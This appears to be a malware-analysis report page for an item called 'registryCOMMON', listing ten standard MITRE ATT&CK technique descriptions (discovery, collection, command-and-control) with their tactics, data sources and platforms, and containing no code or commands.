registryCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre